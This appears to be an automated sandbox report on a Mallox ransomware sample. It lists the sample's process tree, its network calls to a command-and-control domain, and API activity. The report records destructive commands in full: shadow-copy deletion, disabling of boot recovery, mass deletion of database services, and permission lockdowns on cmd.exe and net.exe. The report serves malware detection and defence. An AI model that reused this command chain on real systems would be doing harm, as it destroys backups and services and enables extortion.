Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 27, 2023, 11:43 a.m.	July 27, 2023, 11:45 a.m.

Size	37.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`f369250db766a9469a786daf30c43d97`
SHA256	`134c23ec245a8e10995adfa594154b61bf94e1e5016cf5daeb2b8d594bb16448`
CRC32	`BE367857`
ssdeep	`768:Sur9dUnBnvK4spMElEOdwVXYZ1DpgfmZi8DkbVh:Kpy4sAV0Dpgj8DkP`
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature IsPE32 - (no description)

Zqbpytwp.exe "C:\Users\test22\AppData\Local\Temp\Zqbpytwp.exe"
1440
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\Kill-Delete.bat" "
  2620
  - reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    2744
  - takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
    2804
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3000
  - cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
    1488
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    524
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
    2272
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2120
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    2180
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2980
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    2844
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2084
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    2336
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    2580
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
    792
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2148
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
    2128
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3060
  - cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3048
  - takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
    2532
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2636
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    2652
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2172
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    2808
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2348
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    2780
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    1340
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    2240
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2632
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    2700
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    1808
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    2560
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2588
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    316
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3084
  - cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3120
  - takeown.exe takeown /f C:\Windows\system32\net.exe /a
    3176
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3228
  - cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
    3264
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3320
  - cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
    3356
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3412
  - cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3448
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3504
  - cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
    3540
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3596
  - cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3632
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3688
  - cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
    3724
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3784
  - cacls.exe cacls C:\Windows\system32\net.exe /e /d system
    3820
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3876
  - cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3912
  - takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
    3968
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    4012
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    4048
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2584
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3140
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3224
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3280
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3376
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3360
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3452
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3564
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3648
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3636
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    1476
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
    3776
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3868
  - cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3936
  - takeown.exe takeown /f C:\Windows\system32\net1.exe /a
    4008
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    4092
  - cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
    3088
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3260
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
    3348
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3492
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3592
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3744
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
    2260
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3796
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3960
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    4016
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
    3192
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3404
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
    3532
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3680
  - cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3844
  - takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
    4000
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3112
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3352
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    1780
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3780
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3248
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3516
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3100
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3772
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3240
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3864
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    4136
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    4172
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    4232
  - cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
    4268
- MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  2680
  - vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    2920
  - cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    2940
  - cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
    2948
    - sc.exe sc delete "MSSQLFDLauncher"
      1028
  - cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    948

Name	Response	Post-Analysis Lookup
whyers.io	A 104.21.76.77 A 172.67.191.103	172.67.191.103
api.ipify.org	A 64.185.227.156 CNAME api4.ipify.org A 104.237.62.211 A 173.231.16.76	104.237.62.211

IP Address	Status	Action
104.21.76.77	Active	Moloch
104.237.62.211	Active	Moloch
164.124.101.2	Active	Moloch
80.66.75.37	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49161 -> 80.66.75.37:80	2027265	ET INFO Dotted Quad Host PDF Request	Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 8.8.8.8:53	2046826	ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 104.237.62.211:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49201 -> 104.21.76.77:443	2046827	ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI	A Network Trojan was detected
TCP 192.168.56.103:49201 -> 104.21.76.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49201 104.21.76.77:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=whyers.io	b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameA July 27, 2023, 11:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 27, 2023, 11:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 11:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 27, 2023, 11:43 a.m.			0	0
IsDebuggerPresent July 27, 2023, 11:43 a.m.			0	0
IsDebuggerPresent July 27, 2023, 11:43 a.m.			0	0

Command line console output was observed (50 out of 1371 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: takeown console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: /f C:\Windows\system32\cmd.exe /a console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /g Administrators:f console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /g Users:r console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /g Administrators:r console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /d SERVICE console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /d mssqlserver console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /d "network service" console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /g system:r console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: takeown console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: /f C:\Windows\SysWOW64\cmd.exe /a console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 11:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (5 events)

Time & API	Arguments	Status	Return
CryptExportKey July 27, 2023, 11:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005115d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 27, 2023, 11:43 a.m.	buffer: f Ü/ Ï½¤?j\|NîÓÂu7G:}Ëò-; crypto_handle: 0x005115d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 27, 2023, 11:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 11:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 11:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files\Mozilla Firefox\browser\VisualElements\FILE RECOVERY.txt

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 27, 2023, 11:43 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.66.75.37/Gqfnqspsx.pdf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://api.ipify.org/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://whyers.io/QWEwqdsvsf/ap.php

Performs some HTTP requests (3 events)

request	GET http://80.66.75.37/Gqfnqspsx.pdf
request	GET http://api.ipify.org/
request	POST https://whyers.io/QWEwqdsvsf/ap.php

Sends data using the HTTP POST Method (1 event)

request

POST https://whyers.io/QWEwqdsvsf/ap.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 93 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00322000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00455000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
